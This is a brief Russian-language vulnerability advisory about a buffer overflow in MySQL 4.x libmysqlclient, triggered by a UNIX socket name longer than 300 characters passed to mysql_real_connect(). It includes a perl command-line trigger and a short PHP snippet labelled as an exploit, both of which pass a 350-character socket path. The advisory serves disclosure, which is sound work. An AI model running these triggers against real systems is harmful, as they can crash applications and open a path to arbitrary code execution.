Переполнение буфера обнаружено в MySQL libmysqlclient. Удаленный или локальный пользователь может выполнить произвольный код или аварийно завершить работу приложения, в зависимости от того, как приложение использует уязвимую библиотеку libmysqlclient. 

Переполнение буфера обнаружено в функции mysql_real_connect(). Имя UNIX сокета длиннее 300 символов приведет к переполнению буфера и возможному выполнению произвольного кода. Пример: 

mysql -S `perl -e 'print "A" x 350'` -hlocalhost

Степень воздействие этой уязвимости зависит от приложения, использующего уязвимую функцию. В некоторых приложениях, удаленный или локальный пользователь может заставить приложение выполнять произвольный код. Эксплоит: 

<?php
for ($i;$i<350;$i++)
$buff .= "A";
ini_set("mysql.default_socket","$buff");
mysql_connect("localhost", "blabla", "blabla");
?>

Уязвимость обнаружена в MySQL 4.х и более ранние версии.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии